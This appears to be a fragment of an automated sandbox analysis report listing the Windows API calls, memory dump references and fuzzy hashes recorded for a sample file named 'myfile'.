                                                                • Opcode Fuzzy Hash: 5a151fc5144b64cc9426ccdfebb620900c3bd9d4fd4c5321784a61785958b89c
                                                                • Instruction Fuzzy Hash: 47C0126680520C5ACB00EBB0A90D48977FC960C114B500590D80592440F666DA9483A1
                                                                APIs
                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,0027198F,00000000,00000000,?,00000000,?), ref: 00274574
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoNativeSystem
                                                                • String ID:
                                                                • API String ID: 1721193555-0
                                                                • Opcode ID: aadf968d8beccd77572edb19abd0d7f345d8427375132105008f55429ffd73fc
                                                                • Instruction ID: 63fb98b4e6d3b7d813ce7a68749af355f2e23bd10bd8800353e9f41646663b1b
                                                                • Opcode Fuzzy Hash: aadf968d8beccd77572edb19abd0d7f345d8427375132105008f55429ffd73fc
                                                                • Instruction Fuzzy Hash: E9C01276C1A1085DCF00EBB0A94D4CD7FF49A0D114B100699D806A2450E2668A98C751
                                                                APIs
                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,?,0027611A,00000000,00000000,?,00272BD7,?,00000000,00000000), ref: 00273BF2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateHeap
                                                                • String ID:
                                                                • API String ID: 10892065-0
                                                                • Opcode ID: cd0a4144cd80dc3bcb0711ada08bdd94fe29d8169500a357ae884d67555b7800
                                                                • Instruction ID: 1c61d538e550717955180f69afffdbf20c4fafc29fc54753bf9a1bbe06bab345
                                                                • Opcode Fuzzy Hash: cd0a4144cd80dc3bcb0711ada08bdd94fe29d8169500a357ae884d67555b7800
                                                                • Instruction Fuzzy Hash: E1C08C3024420CEBEB008EC0ED09BA537DCEB04B82F108010FA0C894C0C3B0A8408BE0
                                                                APIs
                                                                • WriteFile.KERNEL32(00000D1A,00000000,00273596,?,00000000,?,00273596,00000000,00000D1A,?), ref: 002764D7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: 780693f9e4e809d42e3f7fbb6227ef392b970ae6c4357ba13d76dfc519a3feb0
                                                                • Instruction ID: 15c81ddac12dde486a45733d1a5d1f1bb9e3aea95cdca037b5ed7af29ebfd3cf
                                                                • Opcode Fuzzy Hash: 780693f9e4e809d42e3f7fbb6227ef392b970ae6c4357ba13d76dfc519a3feb0
                                                                • Instruction Fuzzy Hash: DAC0013614020DFBCF025F81ED0AE9A3F2AEB086A4F108011FA18181608772A930ABA6
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(00000009,?,00275D4D,?,0028CC28,0000073C,0000000F,00000009,?,?,00275C17,?), ref: 00276036
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 32db5bf2ffb7bc026445f919dacaf95bb8211e5ccfe872ed770d7e44386625e7
                                                                • Instruction ID: ae83d39ec540087a6429917a1fe51bc0d3aac9f052b7ad7b8bb46e97f8fe34a2
                                                                • Opcode Fuzzy Hash: 32db5bf2ffb7bc026445f919dacaf95bb8211e5ccfe872ed770d7e44386625e7
                                                                • Instruction Fuzzy Hash: DCB0123200431C3F491836FBBC018CC7B4CCD809787406011F50C041128C73E2624D95
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(?,00000000,00000003), ref: 00273C13
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: d39940bcc5afae96b16eedc49ec56b75012fbcbe438e75d22ea56eb14be5f156
                                                                • Instruction ID: 896f08e448376705e7134eeadb639d6a1c6a633fec4857c316f3d463b5c97302
                                                                • Opcode Fuzzy Hash: d39940bcc5afae96b16eedc49ec56b75012fbcbe438e75d22ea56eb14be5f156
                                                                • Instruction Fuzzy Hash: FFC09B3504461C77CF011F85EC06B547F599700665F504051F90C44461C773D5605754
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00272EA8,?,?,002736DC), ref: 0027446F
                                                                  • Part of subcall function 00274122: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00274134
                                                                  • Part of subcall function 00274122: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,0000004C,00000000), ref: 0027414D
                                                                  • Part of subcall function 00274122: IsValidSid.ADVAPI32(?,00000000), ref: 0027415C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$CurrentInformationOpenValid
                                                                • String ID:
                                                                • API String ID: 3181247963-0
                                                                • Opcode ID: b002d695e1c044e881214e7c32d084ada0eaace0702de6dd034811a2421aa282
                                                                • Instruction ID: f75b52cb364b7ed9f17087688eae1fe8a67534924c3fd85773dd3fe0a3d93db7
                                                                • Opcode Fuzzy Hash: b002d695e1c044e881214e7c32d084ada0eaace0702de6dd034811a2421aa282
                                                                • Instruction Fuzzy Hash: 3AB092B66225088ACA043B70BC1EB0A32589718716F60D8A2E208C4191DB38C8905B24
                                                                APIs
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00273DC3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ChangeCloseFindNotification
                                                                • String ID:
                                                                • API String ID: 2591292051-0
                                                                • Opcode ID: 0ded303a8ca77f76c1b50ae91e9be5ac76bcae33439003223af29d770fbb5fc5
                                                                • Instruction ID: 2f50e7e7adb5db531951ceee2527fad05b898deacf05b64c8de779d5c3abf7eb
                                                                • Opcode Fuzzy Hash: 0ded303a8ca77f76c1b50ae91e9be5ac76bcae33439003223af29d770fbb5fc5
                                                                • Instruction Fuzzy Hash: 3AB09238012A0CEBCB115F44F80D7A83BA9AB00349F548061B90C14470D7719AA0DAD0
                                                                APIs
                                                                • MoveFileW.KERNEL32(00000000,F875FF50), ref: 002765DA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileMove
                                                                • String ID:
                                                                • API String ID: 3562171763-0
                                                                • Opcode ID: c8bf276b84eb6019f3b3abd86032ddc2a8217230a4c6599801dca9ecd6051fbb
                                                                • Instruction ID: 6a8335414716122b0809bc1988eea17a149f1f2b211c6c63394266d9444f3ec4
                                                                • Opcode Fuzzy Hash: c8bf276b84eb6019f3b3abd86032ddc2a8217230a4c6599801dca9ecd6051fbb
                                                                • Instruction Fuzzy Hash: A0B0123500010CFBCF011F91FC098887F2DEB08274B00C010F90C04031C733D9209B90
                                                                APIs
                                                                • HeapDestroy.KERNELBASE(?,?,00275426,?,?,0028D75C,00000000,00000000,?,002713EC,0028D738,?,00000000), ref: 00273C00
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DestroyHeap
                                                                • String ID:
                                                                • API String ID: 2435110975-0
                                                                • Opcode ID: 0d47e830041e68208f151cc1147421d6d868c12c39e2c504ada3417e329eac48
                                                                • Instruction ID: 78283f40e545b24785163ab1e05b58d28818e9eaabdcc3582ea05781a9e4cf26
                                                                • Opcode Fuzzy Hash: 0d47e830041e68208f151cc1147421d6d868c12c39e2c504ada3417e329eac48
                                                                • Instruction Fuzzy Hash: 5CA0113200020CAB8A002F82FC088883F2CEB082B2B200020F80C008208B32A8A08BA0
                                                                APIs
                                                                • CryptBinaryToStringW.CRYPT32(00000000,00000000,40000000,00000000,00271820), ref: 00274D81
                                                                  • Part of subcall function 00273C1E: HeapCreate.KERNEL32(00000000,00100000,00000000,?,00271AA2,?,?,00271AD1), ref: 00273C33
                                                                  • Part of subcall function 00273C1E: GetProcessHeap.KERNEL32(?,00271AA2,?,?,00271AD1), ref: 00273C42
                                                                • CryptBinaryToStringW.CRYPT32(00000000,00000000,40000000,00000000,00271820), ref: 00274DAA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: BinaryCryptHeapString$CreateProcess
                                                                • String ID:
                                                                • API String ID: 869147093-0
                                                                • Opcode ID: 4fea3146b984d0d5a2551cc02991e7e439e0bf2016e34168bb9cd443c80ffdfd
                                                                • Instruction ID: 2aa0512ff0e021a7930ff302588f665e64dcfd733c81dccc4740ccaa0bfc7702
                                                                • Opcode Fuzzy Hash: 4fea3146b984d0d5a2551cc02991e7e439e0bf2016e34168bb9cd443c80ffdfd
                                                                • Instruction Fuzzy Hash: AEF04F33611219ABDB219EB6DC08EDB3BADEF45BA1F14802AFD08C6110D730C92087A0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,'
                                                                • API String ID: 0-2013940313
                                                                • Opcode ID: 94389a93e62d7c07f5c1ac272210a142c76ffef6fb536e77bacda6aa42c1b665
                                                                • Instruction ID: 78524e5acab7ca673fd1355ed28a02f2da80db86750b6a65f90ac48593b49ecb
                                                                • Opcode Fuzzy Hash: 94389a93e62d7c07f5c1ac272210a142c76ffef6fb536e77bacda6aa42c1b665
                                                                • Instruction Fuzzy Hash: 3CA17CB6D002099FCF80CFA9C981ADEFBF5FF88254F24816AE414F7201E274AA558F54
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1fcd97a45084ce38242167ed66ad52a14daada959d75d760d2adcc4ff9bb1134
                                                                • Instruction ID: c590b5884247b2c8f4c57cfb71c91ae741561648f7add6fe3df70d25e53dbe92
                                                                • Opcode Fuzzy Hash: 1fcd97a45084ce38242167ed66ad52a14daada959d75d760d2adcc4ff9bb1134
                                                                • Instruction Fuzzy Hash: 62A2F475A106198FDB48CF69C491AAAF7F2BF8C300F55856ED85AEB741CB34A841CF90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a6f7eb2d3a9a6cf1f31f130f711aa66126134f095f4032c4a73fbd2efd159516
                                                                • Instruction ID: cf092f7193f7084c7bc08cf549b9404c797fbd5df0681dad39783cdef496eeff
                                                                • Opcode Fuzzy Hash: a6f7eb2d3a9a6cf1f31f130f711aa66126134f095f4032c4a73fbd2efd159516
                                                                • Instruction Fuzzy Hash: D0E15D75A2015D8FC709CF2EFC9557A73A0FB4930178A419EE647D7282CA38EA61DB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cef754261d8e4b6ce1d6fe72905a205577cf9a01569579b25f18e753335e996c
                                                                • Instruction ID: c81d62c4c3eda7130bb9961036bd83954168a47cfa6b198646aae2b7c3dbfd37
                                                                • Opcode Fuzzy Hash: cef754261d8e4b6ce1d6fe72905a205577cf9a01569579b25f18e753335e996c
                                                                • Instruction Fuzzy Hash: 7FD14A72B206058FD328CF2EEC40636B7E1EB8C301745896DE45AC7356DB38E961DB94
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: time$Time$BeginPeriodSleep
                                                                • String ID:
                                                                • API String ID: 4118631919-0
                                                                • Opcode ID: fc29b22b782b8560c203740e77577da81cb83bbd114b6084b10493fc8158ca25
                                                                • Instruction ID: d22601a2bc9cc14578747931573051d1f95d272d660b62e2c72aa25cc8db41b2
                                                                • Opcode Fuzzy Hash: fc29b22b782b8560c203740e77577da81cb83bbd114b6084b10493fc8158ca25
                                                                • Instruction Fuzzy Hash: ED113B31E301251A4F18BE7D48C069EFEA6DE81328B1AD369E82CD3184D730CC244680
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 47c376b581d24c7d1e1a0f35ff1822e68f57d00c0a892bdfc065d503b3469f08
                                                                • Instruction ID: dd038dd3b9ba99019d1103c89cb01a1728a1159e5818ae04e00d61643f10e42e
                                                                • Opcode Fuzzy Hash: 47c376b581d24c7d1e1a0f35ff1822e68f57d00c0a892bdfc065d503b3469f08
                                                                • Instruction Fuzzy Hash: 86F0F9B2901208AF8B45CF5DD88559EFBF5EF49264F6581AAEC08EB301D2719A408BE0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 509f6a94fdf042510e336dd1cc9cd65acd2f16b80682f34016c6142793c3d862
                                                                • Instruction ID: 2f92208e2cd7eb6c465aa2c1d9d9ad2e0d5e4d52fdcf87f58a77acdaf95c176a
                                                                • Opcode Fuzzy Hash: 509f6a94fdf042510e336dd1cc9cd65acd2f16b80682f34016c6142793c3d862
                                                                • Instruction Fuzzy Hash: 15B092682066D149C396621582B83B07FA0EB83556F2800FD94EB0E883855E021BDB11
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                • Instruction Fuzzy Hash:
                                                                APIs
                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00276AE7
                                                                • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00276B0B
                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00276B25
                                                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00276BB8
                                                                • CompareFileTime.KERNEL32(?,?), ref: 00276BCA
                                                                • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 00276BF5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Wow64$FileTime$RedirectionSystem$AttributesCompareDirectoryDisableRevert
                                                                • String ID:
                                                                • API String ID: 353865529-0
                                                                • Opcode ID: d93c203cb1313622f9d122b8f54a14f6ac77c436d84f05fd304dc80ac8b387c0
                                                                • Instruction ID: a6ee33a1cc022dec816c708fc69b011ba7207759d12083eb560cfe3295f1fcc6
                                                                • Opcode Fuzzy Hash: d93c203cb1313622f9d122b8f54a14f6ac77c436d84f05fd304dc80ac8b387c0
                                                                • Instruction Fuzzy Hash: 3A418176A1061DAADF50EBF4DC49ADFB3BCAF05300F508466E909F3150EB709A558B61